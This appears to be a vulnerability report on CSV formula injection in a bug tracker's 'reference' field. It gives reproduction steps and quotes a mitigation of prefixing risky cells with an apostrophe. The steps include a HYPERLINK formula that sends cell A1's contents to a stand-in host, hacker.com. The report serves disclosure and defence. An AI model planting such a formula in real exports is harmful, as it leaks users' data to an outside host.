Summary: CSV Excel Macro Injection at ‘reference‘ value
Description: This is inherently risky, because any cells starting with the ‘=’ character will be interpreted by the spreadsheet software as formulae.
Steps To Reproduce
1. At the References of the bug report, add the below script:
=HYPERLINK("http://hacker.com?leak="&A1,"Error: please click for further information")
2. Download as CSV and check References column
What is it?
CSV Excel Macro Injection also known as CEMI.
Many web applications allow the user to download content such as templates for invoices or user settings to a CSV file. Many users choose to open the CSV file in either Excel,Libre Office or Open Office. When a web application does not properly validate the contents of the CSV file, it could lead to contents of a cell or many cells being executed.
The CSV cell will show this info: “Error: please click for further information” and if the user click on this message, they will exfiltrate the contents of cells A1 to http://hacker.com?leak=, which may include the user sensitive data.
“Spreadsheet software could take steps to mitigate some of these attacks, but preventing formula injection is ultimately the responsibility of every application that generates spreadsheets containing user-supplied content. At present, the best defence strategy we are aware of is prefixing cells that start with ‘=’ , ‘+’ or ‘-‘ with an apostrophe. This will ensure that the cell isn’t interpreted as a formula, and as a bonus in Microsoft Excel the apostrophe itself will not be displayed.
Another lesson from this is that .csv and .tsv files should not be viewed as equivalent to .txt files in terms of safety, as it’s simple to embed active content into them.”